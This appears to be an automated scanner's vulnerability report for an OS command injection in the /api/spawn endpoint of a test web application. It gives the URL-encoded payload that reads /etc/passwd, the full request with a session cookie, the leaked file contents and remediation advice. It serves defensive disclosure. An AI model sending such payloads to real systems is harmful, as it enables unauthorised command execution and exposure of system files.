
OS Command Injection #8

Description

@bright-security

OS Command Injection

Severity: High Discovered: 10 October 2022, 11:11 PM

CWE ID

CWE-78

CVSS

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Details

OS command injection (CWE-78) occurs when software builds an operating-system command from externally influenced input without neutralizing the special elements that can change the command it intended to run. In this case no metacharacter break-out was needed: the endpoint executes the value of the query parameter as the command itself, so replacing the original "pwd" with "/bin/cat /etc/passwd" was enough to make the server return the file.
OS command injection was confirmed by injecting the token "/bin/cat /etc/passwd" into parameter "" in the URL.
Original URL:
https://brokencrystals.com/api/spawn?command=pwd
Modified URL:
https://brokencrystals.com/api/spawn?command=%2Fbin%2Fcat+%2Fetc%2Fpasswd
Detected system is:
• Unix (the returned /etc/passwd has a Debian-style layout and a "node" account with UID 1000, which suggests a Node.js application running in a container; the injected command ran with whatever privileges that application process holds)

Possible exposure

Execute Unauthorized Code or Commands

Remediation suggestions

Assume all input is malicious. Use an "accept known good" input validation strategy: an allowlist of acceptable inputs that strictly conform to the specification. Reject any input that does not conform, or transform it into something that does. Consider every relevant property of the input: length, type, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields and conformance to business rules. Business rules matter as much as syntax: "boat" is syntactically valid because it contains only alphanumeric characters, but it is not valid where the input is expected to be a colour such as "red" or "blue". Do not rely exclusively on looking for malicious or malformed input (a denylist). A denylist is likely to miss at least one undesirable input, especially once the code's environment changes, and that gap is enough for an attacker to bypass the intended validation. Denylists are still useful for detecting attack attempts and for rejecting outright inputs so malformed that they cannot be legitimate.

For this endpoint, validation on its own is the weaker fix. The "command" parameter is executed as the command, so what needs validating is not a command string but the name of an operation the server is prepared to perform: map each permitted name to a fixed program and a fixed argument vector, and invoke it through an API that does not go through a shell (for example child_process.execFile rather than exec in Node.js), so that the request never contributes a program path, an argument or a metacharacter. Run the application with the least privilege it needs, since an injected command runs as the application user, and remove the endpoint entirely if nothing legitimate depends on it.

Request

GET https://brokencrystals.com/api/spawn?command=%2Fbin%2Fcat+%2Fetc%2Fpasswd HTTP/1.1
Accept: application/json, text/plain, */*
Referer: https://brokencrystals.com/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Cookie: bc-calls-counter=1665443505238; connect.sid=qFO0ZOMlZencdpy27U_xrZ6KoaLyhAnP.XB9vcn0WrfGI38v1HWvCVWZdmpRqFnTJqFVZWUBpSjg
Accept-Encoding: identity

Response

HTTP/1.1 200
Server: nginx/1.19.8
Date: Mon, 10 Oct 2022 23:11:45 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 965
Connection: keep-alive
vary: Origin
access-control-allow-origin: *
x-xss-protection: 0
strict-transport-security: max-age=0
x-content-type-options: 1
content-security-policy: default-src  * 'unsafe-inline' 'unsafe-eval'
set-cookie: bc-calls-counter=1665443505991
Cache-Control: public, max-age=99999

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash
